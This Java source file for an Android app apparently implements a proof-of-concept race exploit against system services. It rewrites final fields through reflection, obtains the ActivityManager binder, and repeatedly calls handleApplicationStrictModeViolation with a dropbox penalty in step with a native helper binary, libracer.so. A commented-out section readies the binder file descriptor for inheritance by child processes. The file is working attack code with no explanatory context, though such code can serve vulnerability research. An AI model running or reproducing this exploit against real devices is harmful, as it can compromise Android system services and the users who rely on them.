package com.google.jannh.svcmgrracer;

import android.app.ActivityManager;
import android.app.ApplicationErrorReport;
import android.content.Context;
import android.os.IBinder;
import android.os.StrictMode;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.system.Os;
import android.util.Log;
import android.view.View;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileDescriptor;
import java.io.IOException;
import java.io.InputStreamReader;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Random;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }

    private int getBinderFd() {
        for (File entry: (new File("/proc/self/fd/")).listFiles()) {
            String name = entry.getName();
            if (name.charAt(0) < '1' || name.charAt(0) > '9')
                continue;
            try {
                String canonicalPath = entry.getCanonicalPath();
                if (canonicalPath.equals("/dev/binder")) {
                    Log.d("racer", "found binder fd: "+name);
                    return Integer.parseInt(name);
                } else {
                    Log.d("racer", "ignoring fd "+name+", resolves to "+canonicalPath);
                }
            } catch (IOException e) {
                Log.w("racer", "ignoring fd "+name+", unable to resolve link");
            }
        }
        throw new RuntimeException("unable to find binder fd");
    }

    public void doRace(View view) {

        try {
            /*
            // look up the number of our binder fd
            int binderFd = getBinderFd();

            // clear FD_CLOEXEC
            Constructor<FileDescriptor> fdConstructor = FileDescriptor.class.getDeclaredConstructor(Integer.class);
            fdConstructor.setAccessible(true);
            FileDescriptor binderFdWrapper = fdConstructor.newInstance((Integer)binderFd);
            Method fcntlIntMethod = Os.class.getMethod("fcntlInt", FileDescriptor.class, Integer.class, Integer.class);
            fcntlIntMethod.invoke(null, binderFdWrapper, /*F_SETFD* /2, /*clear flags* /0);

            // look up binder objects
            // ServiceManager.getService("activity") -> IBinder, is a javaObjectForIBinder
            */

            // TODO info.hashCode() should be unique; created from stackTrace.hashCode(), broadcastIntentAction.hashCode, and tags
            // info: violationNumThisLoop=0, numAnimationsRunning=0, broadcastIntentAction=null, durationMillis=-1, numInstances=-1, tags=<empty>, crashInfo=null, message=null

            // second-order reflection ahead
            for (Field f: Field.class.getDeclaredFields())
                Log.e("FIELD--FIELD", f.getName());
            Field modifiersField = Field.class.getDeclaredField("accessFlags");
            modifiersField.setAccessible(true);
            Class<?> violationInfoClass = Class.forName("android.os.StrictMode$ViolationInfo");
            Object violationInfoInstance = violationInfoClass.getConstructor().newInstance();
            Field crashInfoField = violationInfoClass.getField("crashInfo");
            modifiersField.setInt(crashInfoField, modifiersField.getInt(crashInfoField) & ~Modifier.FINAL);
            ApplicationErrorReport.CrashInfo ci = new ApplicationErrorReport.CrashInfo();
            ci.stackTrace = new Random().nextInt()+new Random().nextInt()+"";

            crashInfoField.set(violationInfoInstance, ci);
            Class<?> activityManagerNativeClass = Class.forName("android.app.ActivityManagerNative");
            Class<?> activityManagerNativeProxyClass = Class.forName("android.app.ActivityManagerProxy");
            Class<?> serviceManagerClass = Class.forName("android.os.ServiceManager");
            Object activityManagerNativeInstance = activityManagerNativeClass.getMethod("getDefault").invoke(null);
            Object activityManagerNativeProxyInstance = activityManagerNativeClass.getMethod("asInterface", IBinder.class).invoke(
                    null,
                    serviceManagerClass.getMethod("getService", String.class).invoke(null, "activity")
            );
            Method handleModeViolationMethod = activityManagerNativeProxyClass.getMethod(
                    "handleApplicationStrictModeViolation", IBinder.class, int.class, violationInfoClass);
            Object applicationObject = Class.forName("com.android.internal.os.RuntimeInit").getMethod("getApplicationObject").invoke(null);
            int PENALTY_DROPBOX = 0x20 << 16; /* from android.os.StrictMode */


            Process proc = Runtime.getRuntime().exec(new String[] {
                    getApplicationInfo().nativeLibraryDir+"/libracer.so"
            });
            BufferedReader r = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            while (true) {
                String line = r.readLine();
                if (line == null)
                    break;
                if (line.length() > 0 && line.charAt(0) == '#') {
                    handleModeViolationMethod.invoke(activityManagerNativeProxyInstance, applicationObject, PENALTY_DROPBOX, violationInfoInstance);
                    ci.stackTrace = new Random().nextInt()+new Random().nextInt()+"";
                } else {
                    Log.w("racer", "NATIVE CODE:  " + line);
                }
            }
            Log.d("racer", "native code quit");
        } catch (NoSuchMethodException e) {
            throw new RuntimeException(e);
        } catch (IllegalAccessException e) {
            throw new RuntimeException(e);
        } catch (InstantiationException e) {
            throw new RuntimeException(e);
        } catch (InvocationTargetException e) {
            throw new RuntimeException(e);
        } catch (IOException e) {
            throw new RuntimeException(e);
        } catch (ClassNotFoundException e) {
            throw new RuntimeException(e);
        } catch (NoSuchFieldException e) {
            throw new RuntimeException(e);
        }


        // ensure that children can inherit our binder fd

    }
}
